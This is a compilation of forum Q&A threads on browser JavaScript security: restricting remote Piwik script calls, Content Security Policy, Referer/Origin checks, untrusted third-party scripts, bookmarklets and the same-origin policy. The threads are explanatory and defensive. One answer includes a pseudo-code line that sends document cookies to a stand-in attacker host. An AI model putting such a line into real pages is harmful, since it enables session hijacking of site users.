Prevent local PHP/HTML files preview from executing javascript on server - javascript

I have some HTML/PHP pages that include javascript calls.
Those calls points on JS/PHP methods included into a library (PIWIK) stored onto a distant server.
They are triggered using an http://www.domainname.com/ prefix to point the correct files.
I cannot modify the source code of the library.
When my own HTML/PHP pages are locally previewed within a browser, I mean using a c:\xxxx kind path, not a localhost://xxxx one, the distant script are called and do their process.
I don't want this to happen, only allowing those scripts to execute if they are called from a www.domainname.com page.
Can you help me to secure this ?
One can for sure directly bypass this security modifying the web pages on-the-fly with some browser add-on while browsing the real web site, but it's a little bit harder to achieve.
I've opened an issue onto the PIWIK issue tracker, but I would like to secure and protect my web site and the according statistics as soon as possible from this issue, waiting for a further Piwik update.
EDIT
The process I'd like to put in place would be :
Someone opens a page from anywhere than www.domainname.com
> this page calls a JS method on a distant server (or not, may be copied locally),
> this script calls a php script on the distant server
> the PHP script says "hey, from where damn do yo call me, go to hell !". Or the PHP script just do not execute....
I've tried to play with .htaccess for that, but as any JS script must be on a client, it blocks also the legitimate calls from www.domainname.com

Untested, but I think you can use php_sapi_name() or the PHP_SAPI constant to detect the interface PHP is using, and do logic accordingly.
Not wanting to sound cheeky, but your situation sounds rather scary and I would advise searching for some PHP configuration best practices regarding security ;)
Edit after the question has been amended twice:
Now the problem is more clear. But you will struggle to secure this if the JavaScript and PHP are not on the same server.
If they are not on the same server, you will be reliant on HTTP headers (like the Referer or Origin header) which are fakeable.
But PIWIK already tracks the referer ("Piwik uses first-party cookies to keep track some information (number of visits, original referrer, and unique visitor ID)" so you can discount hits from invalid referrers.
If that is not enough, the standard way of being sure that the request to a web service comes from a verified source is to use a standard Cross-Site Request Forgery prevention technique -- a CSRF "token", sometimes also called "crumb" or "nonce", and as this is analytics software I would be surprised if PIWIK does not do this already, if it is possible with their architecture. I would ask them.
Most web frameworks these days have CSRF token generators & API's you should be able to make use of, it's not hard to make your own, but if you cannot amend the JS you will have problems passing the token around. Again PIWIK JS API may have methods for passing session ID's & similar data around.

Original answer
This can be accomplished with a Content Security Policy to restrict the domains that scripts can be called from:
CSP defines the Content-Security-Policy HTTP header that allows you to create a whitelist of sources of trusted content, and instructs the browser to only execute or render resources from those sources.
Therefore, you can set the script policy to self to only allow scripts from your current domain (the filing system) to be executed. Any remote ones will not be allowed.
Normally this would only be available from a source where you get set HTTP headers, but as you are running from the local filing system this is not possible. However, you may be able to get around this with the http-equiv <meta> tag:
Authors who are unable to support signaling via HTTP headers can use tags with http-equiv="X-Content-Security-Policy" to define their policies. HTTP header-based policy will take precedence over tag-based policy if both are present.
Answer after question edit
Look into the Referer or Origin HTTP headers. Referer is available for most requests, however it is not sent from HTTPS resources in the browser and if the user has a proxy or privacy plugin installed it may block this header.
Origin is available for XHR requests only made cross domain, or even same domain for some browsers.
You will be able to check that these headers contain your domain where you will want the scripts to be called from. See here for how to do this with htaccess.
At the end of the day this doesn't make it secure, but as in your own words will make it a little bit harder to achieve.

Related

Monitoring web requests made by a specific javascript src file

I'm looking for some help with the following:
I'm building a website that links external scripts (these scripts can be changed anytime by the script owner).
I want to route any web requests that's being sent by these scripts through my backend server as a proxy, so that I can parse the request and response to make sure they are not exfiltrating data from my website.
The idea here is to be able to leverage external scripts that cannot be trusted 100% with my data.
To enforce this, is it possible to intercept web requests made by <script>s from a different <script> that loaded early on?
If not, what is a better way?
If you cannot trust the scripts, this becomes more of a security question. You should get more information about web security in general.
An interesting example of such implementation is Tampermonkey and it's permission model (similar to what Android apps).
Depending on the use-case, you may want to manually approve each js file and enforce it via integrity checking:
https://developer.mozilla.org/en-US/docs/Web/Security/Subresource_Integrity
At the end of the day, you cannot programmatically check the security of an external js file. You wither trust its author or you don't.

Proper way to inject javascript code?

I would like to create a site with a similar functionality like translate.google.com or hypothes.is has: users can enter any address and the site opening with an additional menu. I gues this is done with some middleware-proxy solution and a javascript is injected in the response, but I'm not sure. Do you have any idea how to implement the same feature? How can it work with secured (https) sites?
Many Thanks
The entire site is fetched by the server, the source code is parsed, code injected and then sent back to the requesting client.
It works with SSL just fine, because it's two separate requests - the request that gets sent to the endpoint is not seen by the user.
The certificate is valid because it's being served under google's domain.
In order to actually implement something like this could potentially be quite complicated, because:
The HTML you are parsing won't necessarily conform to your expectations, or even be valid
The content you're forwarding to the client will likely reference resources with a relative URI. This means that you also need to intercept these requests and pull the resources (images, external css, js, etc) and serve them back to the client - and also rewrite the URLs.
It's very easy to break content by injecting arbitrary javascript. You need to be careful that your injected code is contained and won't interfere with any existing code on the site.
It's very common for an implementation such as this to have non-obvious security concerns, often resulting in XSS attacks being possible.

How are bookmarklets( javascript in a link ) verfied by servers? How is security kept?

I've been trying to access different domains from my JavaScript ( to pull the page title ) but can not b.c. of the same-origin policy.
What I realized is that JavaScript "installed" into the browser via bookmarklets is not restrained by this policy.
This got me to wondering how security is kept...for example delicious bookmarklets...I can just modify them and start ajaxing delicous.com...I don't plan on doing this but likewise someone could do this to a bookmarklet that I create.
How do you create security here?
Do some sites allow public access via ajax?
As far as the server is concerned, there is no such thing as AJAX. AJAX requests are just HTTP requests like any other.
The restriction of cross domain AJAX is done by the browser for the sake of avoiding cross site scripting attacks (you wouldn't want a third party ad to have access to your Stack Overflow session data and be able to ship that somewhere else, would you?).
The browser (apparently) does not limit "bookmarklets" in the same way. If you decided to put a bit of script into a bookmark, I guess the browser is perfectly happy to execute it.

XMLHttpRequest cross site scripting?

I realize this issue of cross site scripting has been covered, however being new to web development I had a few further questions.
Currently I am testing an html file I wrote on my PC connecting to a RESTFul web service on another machine. I am getting status=0. Is this considered cross-site scripting?
If a server hosts a file with javascript, and that javascript file has XMLHttpRequests to the server's own web services, will that work, or is that bad?
Apologies if any of these questions are stupid.
status=0 can me a variety of things, and without knowing more about how you got to that point, it is very difficult to determine what, exactly, it means. You could be using an iframe, the other computer could genuinely be telling you that the status is 0... we don't know.
The general rule is that it doesn't matter where the JS is from, it will execute the data where it's loaded. This is what makes the Google js archiving api possible (you know, use https://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.js on a whole assortment of locations). And honestly, that is not a security issue.
The security issue comes in when a js file tries to access another domain (or even subdomain), whether through manipulation of an iframe or through XMLHTTPRequest. It's at that point that the browser will "lay the smackdown" on the script.
You will have difficulty communicating with JavaScript from your hard drive (file:///) to any internet protocol (http|https) because of this.
No, that is not cross site scripting. When including script JS file from another server it is rendered in your site so You won't be able to access through XMLHttpRequest site where JS script is originally located.
If that is possible than anybody who host jQuery file, there are many servers including google, would be opened for XMLHttpRequests.
SO, IT'S NOT POSSIBLE.
If you want JSON response from another server you can use pjson. Google it for more info.
And Cross Site Scripting is when someone injects JavaScript code on your site in order to bypass access control.
You can use CORS for that. You can use the same code you use now, but the other server you request the page from via ajax has to sent the following header on that page
Access-Control-Allow-Origin: http://yoursite.example.com
#or to allow all hosts
Access-Control-Allow-Origin: *

When linking to an external .js file, isn't this a security risk?

Meaning if I have a website and I link to a external .js file, say for jquery or some widget service, they can pretty easy just pull by authentication cookie and then login as me correct?
What if I am under SSL?
If you include Javascript or JSONP code from another domain, that code has full client-side power and can do whatever it wants.
It can send AJAX requests to automatically make your user do things, and it can steal document.cookie.
If your authentication cookies are HTTP-only, it can't steal them, but it can still impersonate the user using AJAX.
Never include a JS file from a domain you don't trust.
If your page uses SSL, all Javascript files must also use SSL, or an attacker can modify the un-encrypted Javascript to do whatever he wants.
For this reason, browsers will show a security warning if an SSL page uses non-SSL resources.
Note that JSONP is no exception to this rule.
Any JSONP response has full access to your DOM.
If security is a concern, do not use untrusted JSONP APIs.
I can only agree with SLaks and Haochi (+1 and all).
It is extremely insecure and you should never do it even if you trust the domain. Don't trust the answers that tell you that this is not the case because they are just wrong.
This is why now literally all of the links to JavaScript libraries hosted on Google's CDN on the Developer's Guide to Google Libraries API are secure HTTPS links, even though encrypting all of that traffic means a huge overhead even for Google.
They used to recommend using HTTPS only for websites that use HTTPS themselves, now there are no HTTP links in the examples at all.
The point is that you can trust Google and their CDN, but you can never trust the local dns and routers in some poor schmuck's cafe from which your visitors may be connecting to your website and Google's CDN is a great target for obvious reasons.
It depends on what do you mean by "pull". As others have said here, cookies are only sent to where it is originated from. However, a third-party (with malicious intent) file, can still send your cookies back to their server by executing some JavaScript code like
// pseudo-code
cookie_send("http://badguy.tld/?"+document.cookies)
So, only include scripts from trusted sources (Google, Facebook, etc)
No, because cookies for your site will only be sent to your domain.
For example when your browser sees yoursite.com it will send the authentication cookie for yoursite.com. If it also has to make a different request for jquery (for the .js script) it won't send the cookie for yoursite.com (but it will send a jquery cookie - assuming one exists).
Remember every resource is a seperate request under HTTP.
I am not sure HttpOnly is fully supported across all browsers, so I wouldn't trust it to prevent attacks by itself.
If you're worried about a 3rd party attacker (i.e., not the site offering the JS file) grabbing the cookies, definitely use SSL and secure cookies.
If your page isn't running on SSL, using HttpOnly cookies doesn't actually prevent a man-in-the-middle attack, since an attacker in the middle can intercept the cookies regardless by just pretending to be your domain.
If you don't trust the host of an external .js file, don't use the external .js file. An external js file can rewrite the entire page DOM to ask for a CC to be submitted to anyone and have it look (to an average user) the same as your own page, so you're pretty much doomed if you're getting malicious .js files. If you're not sure if a .js host is trustworthy, host a copy of it locally (and check the file for security holes) or don't use it at all. Generally I prefer the latter.
In the specific case of JQuery, just use the copy on Google's CDN if you can't find a copy you like better.
Cookies are domain specific, guarded by same origin policy.

Categories

Resources